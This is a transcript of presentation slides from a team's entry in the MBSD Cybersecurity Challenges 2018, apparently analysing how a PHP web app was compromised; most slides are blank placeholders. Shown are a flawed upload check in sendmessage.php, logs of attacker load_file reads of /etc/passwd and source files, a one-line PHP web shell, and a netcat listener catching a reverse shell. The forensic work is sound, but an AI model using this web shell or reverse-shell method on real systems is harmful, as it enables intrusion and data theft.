Upgrade to Pro — share decks privately, control downloads, hide ads and more …

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

8ayac
December 12, 2018

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

チームIPFactoryとして発表したもの

8ayac

December 12, 2018
Tweet

More Decks by 8ayac

Other Decks in Technology

Transcript

  1. MBSD Cybersecurity Challenges 2018

  2. None
  3. None
  4. ▋ ▋ ▋ ▋ ▋ ▋

  5. ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋

    ▋ ▋ ▋
  6. ▋ ▋ ► ► ► ►

  7. ▋ ► ► ► ► ▋ ► ► ►

  8. None
  9. None
  10. sendmessage.php ▋ ▋ ▋ $prefix = md5(time() . $user->id); $tname

    = $prefix . basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {
  11. sendmessage.php (2018/9/21 14:46:48) 180921 14:39:24 26247 Connect root@192.168.11.204 on mysql

    180921 14:41:06 26247 Query select load_file('/etc/hosts') 180921 14:41:12 26247 Query select load_file('/etc/passwd') 180921 14:42:30 26247 Query select load_file('/etc/issue') 180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf') 180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php') 180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php') 180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php') 180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php') 180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php') 180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
  12. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </>

  13. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

  14. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1 [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
  15. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  16. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  17. (2018/9/21 15:29:02) $ nc –lvp 4444 192.168.11.2 </>

  18. (2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…

  19. (2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…

  20. (2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on

    [0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$
  21. (2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on

    [0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$ 192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  22. None
  23. ▋ ▋ ▋

  24. ▋ ▋ ▋ POST

  25. ▋ ▋ ▋ POST POST

  26. ( ) ▋ ► ►

  27. POST ▋ ► ►

  28. None
  29. 38

  30. ▋ ▋ ▋ ▋ ▋ ▋ ▋

  31. ▋ ▋ ▋ ▋ ▋ ▋ ▋

  32. ▋ ► ▋ ► ▋ ►

  33. ▋ ▋

  34. ▋ ► ► ►

  35. None